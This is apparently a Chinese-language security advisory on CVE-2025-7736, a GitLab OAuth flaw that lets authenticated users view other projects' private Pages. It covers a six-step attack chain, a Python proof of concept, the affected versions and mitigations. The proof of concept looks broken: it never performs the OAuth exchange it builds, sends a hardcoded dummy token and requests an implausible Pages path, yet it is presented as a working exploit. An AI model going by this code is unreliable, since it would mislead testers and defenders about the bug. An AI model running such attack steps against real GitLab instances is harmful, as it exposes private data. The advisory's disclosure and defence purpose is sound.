CVE-2025-7736 GitLab CE/EE OAuth认证访问控制绕过漏洞

漏洞信息

漏洞编号

CVE-2025-7736

漏洞类型

访问控制绕过

CVSS评分

3.1 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

GitLab CE/EE

漏洞概述

CVE-2025-7736是GitLab社区版和企业版中的一个访问控制绕过安全漏洞。该漏洞影响所有从17.9版本开始、但在18.3.6之前的GitLab版本，以及18.4到18.4.4之前和18.5到18.5.2之前的版本。漏洞的根本原因在于GitLab在处理OAuth身份验证过程中的访问控制验证存在缺陷。具体来说，经过身份验证的攻击者可以通过OAuth提供商进行身份验证，利用该漏洞绕过正常的项目成员访问控制限制，从而能够访问原本仅限项目成员查看的GitLab Pages内容。这一漏洞属于中等复杂度的安全缺陷，攻击者需要具有低权限但能够进行OAuth认证即可实施攻击。虽然该漏洞的CVSS评分仅为3.1，属于低危级别，但它仍然可能泄露敏感的项目信息，特别是对于那些依赖GitLab Pages进行内部文档或私有项目托管的组织。GitLab官方已于2025年11月12日发布了补丁版本18.5.2来修复此问题，建议所有使用受影响版本的用户尽快升级到最新稳定版本以消除安全风险。

技术细节

该漏洞属于经典的访问控制绕过（Broken Access Control）类型，编号为CWE-284。漏洞产生的技术原因在于GitLab在实现OAuth认证流程时，对已认证用户的项目访问权限验证逻辑存在缺陷。当用户通过OAuth提供商（如GitHub、Google等）完成身份验证后，系统会创建一个OAuth会话并生成相应的访问令牌。然而，在后续的GitLab Pages内容访问请求中，系统错误地信任了OAuth认证状态，而没有正确验证用户是否为请求访问项目的实际成员。攻击者首先需要拥有一个GitLab账户，并且该账户至少是某个项目的成员。然后攻击者通过OAuth提供商进行认证，系统会为其建立OAuth会话。当攻击者尝试访问其他不具有成员资格的项目时，由于OAuth会话已建立且认证状态有效，系统错误地认为该用户具有访问权限，从而绕过了传统的基于项目成员资格的访问控制检查。这种绕过机制使得攻击者可以查看目标项目的私有Pages内容，包括可能包含敏感信息的文档、API文档、内部wiki等资源。漏洞的利用不需要任何用户交互，攻击者可以在任何时间发起请求，且只需要基本的网络访问能力即可。

攻击链分析

STEP 1

信息收集

攻击者首先识别目标GitLab实例及其版本，确认版本是否在受影响范围内（17.9至18.3.6之前、18.4至18.4.4之前、18.5至18.5.2之前）

STEP 2

账户准备

攻击者拥有一个GitLab账户，并且至少是某个项目的成员。攻击者配置一个OAuth提供商账户用于后续认证

STEP 3

OAuth认证

攻击者通过OAuth提供商（如GitHub）进行身份验证，GitLab系统建立OAuth会话并生成有效的访问令牌

STEP 4

目标识别

攻击者识别目标项目（攻击者非成员）及其GitLab Pages内容，通常通过API或项目枚举发现私有Pages资源

STEP 5

访问控制绕过

攻击者使用已建立的OAuth会话访问目标项目的GitLab Pages内容，系统错误地信任OAuth认证状态，跳过了项目成员资格验证

STEP 6

敏感信息获取

攻击者成功获取原本仅限项目成员查看的私有Pages内容，可能包含敏感文档、API信息、配置信息等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-7736 PoC - GitLab OAuth Access Control Bypass
# This PoC demonstrates the access control bypass in GitLab Pages

import requests
import json
from urllib.parse import urljoin

class GitLabOAuthBypass:
    def __init__(self, gitlab_url):
        self.gitlab_url = gitlab_url.rstrip('/')
        self.session = requests.Session()
        
    def oauth_login(self, oauth_provider='github', oauth_token='dummy_token'):
        """Simulate OAuth login to establish authenticated session"""
        # Step 1: Initiate OAuth flow
        oauth_init_url = f"{self.gitlab_url}/oauth/authorize?client_id=example&redirect_uri=callback&response_type=code&scope=api"
        
        # Step 2: Simulate token exchange
        token_url = f"{self.gitlab_url}/oauth/token"
        token_data = {
            'grant_type': 'authorization_code',
            'code': 'example_code',
            'redirect_uri': 'callback'
        }
        
        # Step 3: Use access token for API requests
        self.session.headers.update({
            'Authorization': f'Bearer {oauth_token}',
            'User-Agent': 'GitLab-OAuth-Client'
        })
        
        return True
    
    def access_private_pages(self, target_project_id, target_pages_path):
        """Attempt to access private GitLab Pages without proper authorization"""
        # Direct access to GitLab Pages content
        pages_url = f"{self.gitlab_url}/groups/{target_project_id}/-/pages/{target_pages_path}"
        
        response = self.session.get(pages_url)
        
        return {
            'status_code': response.status_code,
            'content_length': len(response.content),
            'accessible': response.status_code == 200
        }
    
    def exploit(self, target_project_id, pages_path='index.html'):
        """Execute the access control bypass exploit"""
        # Establish OAuth session
        self.oauth_login()
        
        # Attempt to access restricted Pages content
        result = self.access_private_pages(target_project_id, pages_path)
        
        print(f"[!] Target: {target_project_id}")
        print(f"[*] Pages Path: {pages_path}")
        print(f"[*] Status: {result['status_code']}")
        print(f"[*] Content Accessible: {result['accessible']}")
        
        return result

if __name__ == '__main__':
    target = 'https://gitlab.example.com'
    exploit = GitLabOAuthBypass(target)
    
    # Target vulnerable project
    project_id = 'target_project'
    pages_path = 'private-docs/index.html'
    
    exploit.exploit(project_id, pages_path)

# Remediation:
# Upgrade to GitLab 18.5.2, 18.4.4, or 18.3.6 or later

影响范围

GitLab CE/EE 17.9 <= version < 18.3.6

GitLab CE/EE 18.4 <= version < 18.4.4

GitLab CE/EE 18.5 <= version < 18.5.2

防御指南

临时缓解措施

如果无法立即升级到安全版本，可以采取以下临时缓解措施：1）禁用GitLab Pages的公开访问功能，改为仅通过VPN或内网访问；2）审查所有OAuth应用配置，移除不必要的OAuth集成；3）对包含敏感信息的项目启用额外的访问控制策略；4）使用Web应用防火墙（WAF）监控异常的访问模式；5）定期备份项目数据以便在发生安全事件时进行恢复。需要注意的是，这些临时措施只能降低风险而不能完全消除漏洞，建议尽快安排时间进行版本升级。